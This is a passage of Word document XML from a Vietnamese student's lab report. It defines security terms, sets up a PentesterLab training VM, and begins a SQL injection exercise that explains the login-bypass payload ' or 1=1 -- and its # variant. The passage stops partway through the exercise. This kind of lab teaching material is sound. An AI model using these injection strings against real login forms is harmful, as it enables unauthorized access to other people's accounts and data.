          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Web Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B72C31" w14:textId="40224DEF"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python,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>javascript,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ruby…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7527180F"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Một số thuật ngữ bạn cần phải biết trong quá trình thực hành:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D2E37E"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Capcha: Captcha là từ viết tắt của Completely Automated Public Turing test to tell Computers and Humans Apart (Phép thử Turing công cộng tự động để phân biệt máy tính với người). Đây thực chất là một mã kiểm tra nhằm xác định người dùng là người thực hay máy tính spam. Theo đó, máy chủ sẽ gửi yêu cầu đến người dùng để hoàn tất một quá trình kiểm tra đơn giản, mà chỉ có người thực mới có thể hoàn thành gõ các mẫu từ captcha.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706E5647"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Authentication: Authentication là về việc xác thực thông tin đăng nhập của bạn như Tên người dùng / ID người dùng và mật khẩu để xác minh danh tính của bạn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F0C539" w14:textId="0464B8D9"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Authorization: Authorization là quá trình để xác định xem người dùng được xác thực có quyền truy cập vào các tài nguyên cụ thể hay không. Nó xác minh quyền của bạn để cấp cho bạn quyền truy cập vào các tài nguyên như thông tin, cơ sở dữ liệu, file,</w:t>
      </w:r>
      <w:r w:rsidR="00E719D1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CAF70B" w14:textId="77777777" w:rsidR="007056C2" w:rsidRPr="007056C2" w:rsidRDefault="007056C2" w:rsidP="007056C2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ꞏ </w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mass Assignment: xu</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ấ</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t ph</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:cs="VNI-Times"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t t</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ừ</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ng</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:cs="VNI-Times"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ô</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n ng</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ữ</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ruby on Rails, l</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:cs="VNI-Times"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> tính n</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ă</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ng cho ph</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:cs="VNI-Times"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p l</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ậ</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p tr</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:cs="VNI-Times"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ì</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nh m</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ộ</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t c</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:cs="VNI-Times"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ch t</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ự</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:cs="VNI-Times"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ộ</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ng g</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:cs="VNI-Times"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n c</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:cs="VNI-Times"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c tham s</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ố</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ủ</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a m</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ộ</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t HTTP request v</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:cs="VNI-Times"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>o c</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:cs="VNI-Times"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c bi</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ế</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n ho</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ặ</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">c </w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:cs="VNI-Times"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>đ</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ố</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i t</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ượ</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ng trong l</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ậ</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p tr</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:cs="VNI-Times"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ì</w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43744AF2"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Randomness Issues: Ngẫu nhiên còn là một thuật ngữ được sử dụng trong toán học, có nghĩa là không có cách nào để dự đoán đáng tin cậy một kết quả hoặc phán đoán một khuôn mẫu. Cái được chọn ngẫu nhiên thì được chọn mà không có ý thức về bất kỳ lý do nào, và do đó được cho là hoàn toàn tình cờ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6BF99B" w14:textId="77777777" w:rsidR="007056C2" w:rsidRPr="007056C2" w:rsidRDefault="007056C2" w:rsidP="007056C2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ꞏ MongoDB: MongoDB là một cơ sở dữ liệu nguồn mở sử dụng một mô hình dữ liệu hướng tài liệu và một ngôn ngữ truy vấn không có cấu trúc. Đây là một trong những hệ thống và cơ sở dữ liệu NoSQL mạnh mẽ nhất hiện nay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6195C163" w14:textId="6F6CD247" w:rsidR="007056C2" w:rsidRDefault="00AB41AE" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="004653AE" w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BEBDE8"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Bài tập thực hành này được tôi demo và thực hiện thông qua trang web pentesterlab.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A883FED"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Đầu tiên ta truy cập vào trang pentesterlab để tiến hành downloads file ISO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58094E59" w14:textId="3E952540"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184BBF05">
          <v:shape id="Hình ảnh 71" o:spid="_x0000_i1104" type="#_x0000_t75" style="width:375pt;height:189pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId92" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="780F91DB" w14:textId="09F9B5BB"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Tiếp theo tiến hành cài đặt file ISO theo cách mà tôi đã thực hiện ở lab1.Sau khi quá trình cài đặt hoàn thành,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ta được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085B837C" w14:textId="44CDA065" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="7F766B1B">
          <v:shape id="Hình ảnh 72" o:spid="_x0000_i1105" type="#_x0000_t75" style="width:303pt;height:212.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId93" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CFE884" w14:textId="3354C781" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp tục khởi động máy ảo,</w:t>
      </w:r>
      <w:r w:rsidR="002A117B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>sau đó ghi địa chỉ IP vào thanh URl trên trình duyệt ta được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7817D9D4" w14:textId="51EFCBF0" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="79DE7729">
          <v:shape id="Hình ảnh 73" o:spid="_x0000_i1106" type="#_x0000_t75" style="width:385.5pt;height:225.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId94" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="460C9DF7" w14:textId="56767D73" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp theo thực hiện quá trình khai thác.</w:t>
      </w:r>
      <w:r w:rsidR="002A117B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Ở đây tôi bắt đầu trước tiên với SQL injections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D14E19F" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00FD5E5E" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5E5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A.SQL injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5520893F" w14:textId="79D5E640" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Trong phần này,</w:t>
      </w:r>
      <w:r w:rsidR="002A117B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>tôi sẽ thực hiện một số ví dụ về chèn SQL phổ biến được cung cấp chỉ nằm ở mức độ dễ và trung bình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3E12B9" w14:textId="6815F5A2" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Example 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54611F11" w14:textId="77777777" w:rsidR="004653AE" w:rsidRPr="00A96C02" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A96C02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Để tạo một câu lệnh, bạn chỉ cần thực hiện 1 = 1, điều này luôn đúng, bây giờ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tôi</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> phải chỉnh sửa câu lệnh vì chúng ta không thể nói trên truy vấn rằng "select user where true" mà chúng ta có thể đánh lừa bằng cách sử dụng toán tử OR như "hoặc 1 = 1", tôi thậm chí có thể nhận xét phần còn lại của truy vấn bằng cách sử dụng dấu # để không viết ra mật khẩu "hoặc 1 = 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96C02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF1C38A" w14:textId="35DB4574" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="623FFD3C">
          <v:shape id="Hình ảnh 74" o:spid="_x0000_i1107" type="#_x0000_t75" style="width:405.75pt;height:228.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId95" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E76258" w14:textId="27141914" w:rsidR="004653AE" w:rsidRPr="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử </w:t>
      </w:r>
      <w:r w:rsidRPr="00E46243">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">dụng cú pháp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>‘ or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1 –-</w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> cú pháp này dung để bỏ qua bộ lọc ký tự trong SQL.Và sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ở cuối để bỏ qua tất cả câu truy vấn ở phía sau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B4A24F" w14:textId="4F6C3619" w:rsidR="004653AE" w:rsidRDefault="004653AE" w:rsidP="004653AE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Sau khi ta điền câu lệnh vào phần username với mật khẩu là pentesterlab. Ta tiến hành gửi truy vấn và thu được kết quả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C39076" w14:textId="5FD1F45B" w:rsidR="004653AE" w:rsidRDefault="00283404" w:rsidP="002A117B">
      <w:pPr>
